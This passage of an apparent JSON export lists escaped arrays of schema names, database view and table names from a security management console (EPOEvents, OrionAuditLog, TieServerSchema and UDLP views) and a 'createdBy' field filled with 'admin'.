\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\"",
    "target": "\"[\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EpoComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_Computers\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_ComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogTask\\\",\\r\\n\\t\\t\\t\\\"EPOBrokenInherintanceView\\\",\\r\\n\\t\\t\\t\\\"EPOTaskAppliedTasks\\\",\\r\\n\\t\\t\\t\\\"EPOTaskBrokenInheritAssignments\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPORepositoryStatus\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOAgentHandlers\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"EndpointInstallationStatus_View\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"AM_EndpointTechnologyStatus_View\\\",\\r\\n\\t\\t\\t\\\"GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ProductDistributionAllView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_UserEmailStorageDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputersToPoliciesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_UserFileSystemDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestFileSysDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.certificate_rep_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.certificate_rep_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.certificate_trust_level_count_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"ClientUILockOutStatusTable_view\\\",\\r\\n\\t\\t\\t\\\"ClientUICurrentLockOutStatus_View\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"MDCC_VW_SECURITY_INCIDENT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_INFO\\\",\\r\\n\\t\\t\\t\\\"MDCC_ACCOUNT\\\",\\r\\n\\t\\t\\t\\\"SCOR_VW_INV_APPS\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_INFO\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SEC_REPORT_VIEW\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SCAN_REPORT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VW_SECURITY_INCIDENT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_INFO\\\",\\r\\n\\t\\t\\t\\\"MDCC_ACCOUNT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"ASSESSMENT_DASHBOARD_VIEW\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SEC_REPORT_VIEW\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_Operationals\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.agent_new_file_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_Operationals\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_EPD_LatestEmailDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.certificate_rep_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.agent_new_certificate_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.file_rep_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.file_rep_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.file_trust_level_count_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.file_rep_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.agent_new_file_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.fileJoined\\\",\\r\\n\\t\\t\\t\\\"USAGE_METERING_ALF_VIEW\\\",\\r\\n\\t\\t\\t\\\"MDCC_DPC_VM_VIEW\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"ATP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"ATP_CustomProps\\\"\\r\\n\\t\\t]\"",
    "createdBy": "\"[\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r